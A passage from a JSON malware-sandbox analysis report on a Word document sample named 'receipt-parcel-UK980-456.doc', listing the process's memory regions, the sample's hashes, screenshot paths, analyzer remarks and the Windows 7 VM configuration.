"private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:07:38.295", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 31784960, "type": "region", "version": 1 }, "end_va": 35926015, "entry_point": 0, "filename": null, "id": "region_4178", "name": "pagefile_0x0000000001e50000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 31784960, "timestamp": "00:07:38.295", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1982070784, "type": "region", "version": 1 }, "end_va": 1983238143, "entry_point": 1982070784, "filename": "\\Windows\\SysWOW64\\crypt32.dll", "id": "region_4179", "name": "crypt32.dll", "norm_filename": "c:\\windows\\syswow64\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1982070784, "timestamp": "00:07:38.297", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1983250432, "type": "region", "version": 1 }, "end_va": 1983299583, "entry_point": 1983250432, "filename": "\\Windows\\SysWOW64\\msasn1.dll", "id": "region_4180", "name": "msasn1.dll", "norm_filename": "c:\\windows\\syswow64\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1983250432, "timestamp": "00:07:38.297", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1990656000, "type": "region", "version": 1 }, "end_va": 2003542015, "entry_point": 1990656000, "filename": "\\Windows\\SysWOW64\\shell32.dll", "id": "region_4181", "name": "shell32.dll", "norm_filename": "c:\\windows\\syswow64\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1990656000, "timestamp": "00:07:38.302", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1983315968, "type": "region", "version": 1 }, "end_va": 1983672319, "entry_point": 1983315968, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_4182", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1983315968, "timestamp": "00:07:38.302", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1974272000, "type": "region", "version": 1 }, "end_va": 1974292479, "entry_point": 1974272000, "filename": "\\Windows\\SysWOW64\\psapi.dll", "id": "region_4187", "name": "psapi.dll", "norm_filename": "c:\\windows\\syswow64\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 1974272000, "timestamp": "00:07:38.311", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1974337536, "type": "region", "version": 1 }, "end_va": 1975762943, "entry_point": 1974337536, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_4188", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1974337536, "timestamp": "00:07:38.311", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1978793984, "type": "region", "version": 1 }, "end_va": 1979797503, "entry_point": 1978793984, "filename": "\\Windows\\SysWOW64\\wininet.dll", "id": "region_4189", "name": "wininet.dll", "norm_filename": "c:\\windows\\syswow64\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1978793984, "timestamp": "00:07:38.314", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987862527, "entry_point": 1986592768, "filename": "\\Windows\\SysWOW64\\urlmon.dll", "id": "region_4190", "name": "urlmon.dll", "norm_filename": "c:\\windows\\syswow64\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:07:38.315", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1981480960, "type": "region", "version": 1 }, "end_va": 1982066687, "entry_point": 1981480960, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_4191", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1981480960, "timestamp": "00:07:38.315", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1975779328, "type": "region", "version": 1 }, "end_va": 1977855999, "entry_point": 1975779328, "filename": "\\Windows\\SysWOW64\\iertutil.dll", "id": "region_4192", "name": "iertutil.dll", "norm_filename": "c:\\windows\\syswow64\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1975779328, "timestamp": "00:07:38.315", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1969815552, "type": "region", "version": 1 }, "end_va": 1969848319, "entry_point": 1969815552, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_4193", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1969815552, "timestamp": "00:07:38.319", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2162688, "start_va": 35979264, "type": "region", "version": 1 }, "end_va": 38141951, "entry_point": 0, "filename": null, "id": "region_4194", "name": "private_0x0000000002250000", "norm_filename": null, "region_type": "private_memory", "start_va": 35979264, "timestamp": "00:07:38.319", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1969684480, "type": "region", "version": 1 }, "end_va": 1969774591, "entry_point": 1969684480, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_4195", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1969684480, "timestamp": "00:07:38.320", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 245760, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 1228799, "entry_point": 983040, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_4196", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 983040, "timestamp": "00:07:38.321", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1969422336, "type": "region", "version": 1 }, "end_va": 1969663999, "entry_point": 1969422336, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_4201", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1969422336, "timestamp": "00:07:38.328", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 38141952, "type": "region", "version": 1 }, "end_va": 41086975, "entry_point": 38141952, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_4202", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 38141952, "timestamp": "00:07:38.329", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 0, "filename": null, "id": "region_4203", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:07:38.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 3145727, "entry_point": 0, "filename": null, "id": "region_4204", "name": "private_0x00000000002c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2883584, "timestamp": "00:07:38.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 3604479, "entry_point": 0, "filename": null, "id": "region_4205", "name": "private_0x0000000000330000", "norm_filename": null, "region_type": "private_memory", "start_va": 3342336, "timestamp": "00:07:38.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3801088, "type": "region", "version": 1 }, "end_va": 4063231, "entry_point": 0, "filename": null, "id": "region_4206", "name": "private_0x00000000003a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3801088, "timestamp": "00:07:38.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 5177344, "type": "region", "version": 1 }, "end_va": 5439487, "entry_point": 0, "filename": null, "id": "region_4207", "name": "private_0x00000000004f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5177344, "timestamp": "00:07:38.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 5570560, "type": "region", "version": 1 }, "end_va": 5832703, "entry_point": 0, "filename": null, "id": "region_4208", "name": "private_0x0000000000550000", "norm_filename": null, "region_type": "private_memory", "start_va": 5570560, "timestamp": "00:07:38.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 36044800, "type": "region", "version": 1 }, "end_va": 36306943, "entry_point": 0, "filename": null, "id": "region_4209", "name": "private_0x0000000002260000", "norm_filename": null, "region_type": "private_memory", "start_va": 36044800, "timestamp": "00:07:38.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 36372480, "type": "region", "version": 1 }, "end_va": 36634623, "entry_point": 0, "filename": null, "id": "region_4210", "name": "private_0x00000000022b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 36372480, "timestamp": "00:07:38.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37027840, "type": "region", "version": 1 }, "end_va": 37289983, "entry_point": 0, "filename": null, "id": "region_4211", "name": "private_0x0000000002350000", "norm_filename": null, "region_type": "private_memory", "start_va": 37027840, "timestamp": "00:07:38.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37355520, "type": "region", "version": 1 }, "end_va": 37617663, "entry_point": 0, "filename": null, "id": "region_4212", "name": "private_0x00000000023a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37355520, "timestamp": "00:07:38.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 37617664, "type": "region", "version": 1 }, "end_va": 38141951, "entry_point": 0, "filename": null, "id": "region_4213", "name": "private_0x00000000023e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37617664, "timestamp": "00:07:38.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 41287680, "type": "region", "version": 1 }, "end_va": 41549823, "entry_point": 0, "filename": null, "id": "region_4214", "name": "private_0x0000000002760000", "norm_filename": null, "region_type": "private_memory", "start_va": 41287680, "timestamp": "00:07:38.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 41746432, "type": "region", "version": 1 }, "end_va": 42008575, "entry_point": 0, "filename": null, "id": "region_4215", "name": "private_0x00000000027d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 41746432, "timestamp": "00:07:38.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130317312, "type": "region", "version": 1 }, "end_va": 2130329599, "entry_point": 0, "filename": null, "id": "region_4216", "name": "private_0x000000007efa1000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130317312, "timestamp": "00:07:38.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130329600, "type": "region", "version": 1 }, "end_va": 2130341887, "entry_point": 0, "filename": null, "id": "region_4217", "name": "private_0x000000007efa4000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130329600, "timestamp": "00:07:38.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130341888, "type": "region", "version": 1 }, "end_va": 2130354175, "entry_point": 0, "filename": null, "id": "region_4218", "name": "private_0x000000007efa7000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130341888, "timestamp": "00:07:38.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_4219", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:07:38.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_4220", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:07:38.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_4221", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:07:38.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 42401792, "type": "region", "version": 1 }, "end_va": 42663935, "entry_point": 0, "filename": null, "id": "region_4222", "name": "private_0x0000000002870000", "norm_filename": null, "region_type": "private_memory", "start_va": 42401792, "timestamp": "00:07:38.354", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 42729472, "type": "region", "version": 1 }, "end_va": 42991615, "entry_point": 0, "filename": null, "id": "region_4223", "name": "private_0x00000000028c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 42729472, "timestamp": "00:07:38.354", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130305024, "type": "region", "version": 1 }, "end_va": 2130317311, "entry_point": 0, "filename": null, "id": "region_4224", "name": "private_0x000000007ef9e000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130305024, "timestamp": "00:07:38.354", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 42991616, "type": "region", "version": 1 }, "end_va": 44040191, "entry_point": 0, "filename": null, "id": "region_4225", "name": "private_0x0000000002900000", "norm_filename": null, "region_type": "private_memory", "start_va": 42991616, "timestamp": "00:07:38.355", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 49152, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 638975, "entry_point": 0, "filename": null, "id": "region_4278", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:07:40.357", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 6094848, "type": "region", "version": 1 }, "end_va": 6356991, "entry_point": 0, "filename": null, "id": "region_4644", "name": "private_0x00000000005d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6094848, "timestamp": "00:08:08.647", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 44498944, "type": "region", "version": 1 }, "end_va": 44761087, "entry_point": 0, "filename": null, "id": "region_4645", "name": "private_0x0000000002a70000", "norm_filename": null, "region_type": "private_memory", "start_va": 44498944, "timestamp": "00:08:08.647", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 45088768, "type": "region", "version": 1 }, "end_va": 45350911, "entry_point": 0, "filename": null, "id": "region_4646", "name": "private_0x0000000002b00000", "norm_filename": null, "region_type": "private_memory", "start_va": 45088768, "timestamp": "00:08:08.647", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 45547520, "type": "region", "version": 1 }, "end_va": 45809663, "entry_point": 0, "filename": null, "id": "region_4647", "name": "private_0x0000000002b70000", "norm_filename": null, "region_type": "private_memory", "start_va": 45547520, "timestamp": "00:08:08.647", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130292736, "type": "region", "version": 1 }, "end_va": 2130305023, "entry_point": 0, "filename": null, "id": "region_4648", "name": "private_0x000000007ef9b000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130292736, "timestamp": "00:08:08.647", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 45056, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 634879, "entry_point": 0, "filename": null, "id": "region_4687", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:08:49.097", "type": "region", "version": 1 } ], "terminate_reason": "timeout", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 } ], "remarks": { "critical": [], "non_critical": [ { "comment": "The maximum number of dumps was reached during the analysis. Some memory dumps may be missing in the reports. You can increase the limit in the configuration.", "id": 2048, "type": "remark", "version": 1 }, { "comment": "The dump total size limit was reached during the analysis. Some memory dump may be missing in the reports. You can increase the limit in the configuration.", "id": 512, "type": "remark", "version": 1 }, { "comment": "The operating system was rebooted during the analysis.", "id": 128, "type": "remark", "version": 1 } ], "type": "remarks", "version": 1 }, "sample_details": { "filename": "receipt-parcel-UK980-456.doc", "id": 20911, "md5_hash": "1dfa6c28e296b4196f92c8b97e050754", "sample_type": "word_document", "sha1_hash": "b8c701c3a0059820ee60111aa3cc6add2dbc33d0", "sha256_hash": "880b352d1186a1c33d73a42907ee9b9902363c2358fe9f0c540c776602093772", "size": 111616, "type": "sample_details", "version": 1 }, "screenshots": [ { "screenshot_archive_path": "screenshots/screenshot_0.png", "size": 110632, "thumbnail_archive_path": "screenshots/thumbnail_0.png", "timestamp": "00:00:00.000", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_16177.png", "size": 263639, "thumbnail_archive_path": "screenshots/thumbnail_16177.png", "timestamp": "00:00:16.177", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_17269.png", "size": 263124, "thumbnail_archive_path": "screenshots/thumbnail_17269.png", "timestamp": "00:00:17.269", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_18297.png", "size": 263083, "thumbnail_archive_path": "screenshots/thumbnail_18297.png", "timestamp": "00:00:18.297", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_19296.png", "size": 93168, "thumbnail_archive_path": "screenshots/thumbnail_19296.png", "timestamp": "00:00:19.296", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_20296.png", "size": 98605, "thumbnail_archive_path": "screenshots/thumbnail_20296.png", "timestamp": "00:00:20.296", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_24584.png", "size": 98097, "thumbnail_archive_path": "screenshots/thumbnail_24584.png", "timestamp": "00:00:24.584", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_26818.png", "size": 96462, "thumbnail_archive_path": "screenshots/thumbnail_26818.png", "timestamp": "00:00:26.818", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_30195.png", "size": 109536, "thumbnail_archive_path": "screenshots/thumbnail_30195.png", "timestamp": "00:00:30.195", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_39682.png", "size": 108233, "thumbnail_archive_path": "screenshots/thumbnail_39682.png", "timestamp": "00:00:39.682", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_41682.png", "size": 109638, "thumbnail_archive_path": "screenshots/thumbnail_41682.png", "timestamp": "00:00:41.682", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_44730.png", "size": 114899, "thumbnail_archive_path": "screenshots/thumbnail_44730.png", "timestamp": "00:00:44.730", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_47781.png", "size": 114672, "thumbnail_archive_path": "screenshots/thumbnail_47781.png", "timestamp": "00:00:47.781", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_51821.png", "size": 109503, "thumbnail_archive_path": "screenshots/thumbnail_51821.png", "timestamp": "00:00:51.821", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_54822.png", "size": 109502, "thumbnail_archive_path": "screenshots/thumbnail_54822.png", "timestamp": "00:00:54.822", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_57821.png", "size": 113899, "thumbnail_archive_path": "screenshots/thumbnail_57821.png", "timestamp": "00:00:57.821", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_60822.png", "size": 109516, "thumbnail_archive_path": "screenshots/thumbnail_60822.png", "timestamp": "00:01:00.822", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_63848.png", "size": 115424, "thumbnail_archive_path": "screenshots/thumbnail_63848.png", "timestamp": "00:01:03.848", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_66953.png", "size": 115338, "thumbnail_archive_path": "screenshots/thumbnail_66953.png", "timestamp": "00:01:06.953", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_70020.png", "size": 114175, "thumbnail_archive_path": "screenshots/thumbnail_70020.png", "timestamp": "00:01:10.020", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_73144.png", "size": 114614, "thumbnail_archive_path": "screenshots/thumbnail_73144.png", "timestamp": "00:01:13.144", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_80714.png", "size": 115626, "thumbnail_archive_path": "screenshots/thumbnail_80714.png", "timestamp": "00:01:20.714", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_81744.png", "size": 115269, "thumbnail_archive_path": "screenshots/thumbnail_81744.png", "timestamp": "00:01:21.744", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_84805.png", "size": 109892, "thumbnail_archive_path": "screenshots/thumbnail_84805.png", "timestamp": "00:01:24.805", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_102387.png", "size": 109357, "thumbnail_archive_path": "screenshots/thumbnail_102387.png", "timestamp": "00:01:42.387", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_128368.png", "size": 109790, "thumbnail_archive_path": "screenshots/thumbnail_128368.png", "timestamp": "00:02:08.368", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_133376.png", "size": 109914, "thumbnail_archive_path": "screenshots/thumbnail_133376.png", "timestamp": "00:02:13.376", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_197550.png", "size": 110157, "thumbnail_archive_path": "screenshots/thumbnail_197550.png", "timestamp": "00:03:17.550", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_202686.png", "size": 109840, "thumbnail_archive_path": "screenshots/thumbnail_202686.png", "timestamp": "00:03:22.686", "type": "screenshot", "version": 1 } ], "type": "summary", "version": 1, "vm_and_analyzer_details": { "adobe_acrobat_reader_version": "not_installed", "analyzer_build_date": "2017-12-15 17:49", "analyzer_version": "2.2.0", "chrome_version": "59.0.3071.115", "firefox_version": "25.0", "flash_version": "11.2.202.233", "internet_explorer_version": "8.0.7601.17514", "java_version": "7.0.710", "microsoft_excel_version": "16.0.4266.1003", "microsoft_office_version": "16.0.4266.1003", "microsoft_power_point_version": "16.0.4266.1003", "microsoft_project_version": "16.0.4266.1003", "microsoft_publisher_version": "16.0.4266.1003", "microsoft_visio_version": "16.0.4266.1003", "microsoft_word_version": "16.0.4266.1003", "silverlight_version": "not_installed", "type": "vm_and_analyzer_details", "version": 1, "vm_architecture": "x86_64-bit", "vm_kernel_version": "6.1.7601.17514_(3844dbb9-2017-4967-be7a-a4a2c20430fa)", "vm_name": null, "vm_os": "windows_7" }, "vti": { "type": "vti", "version": 1, "vti_built_in_rules_version": "2.6", "vti_rule_matches": [ { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, 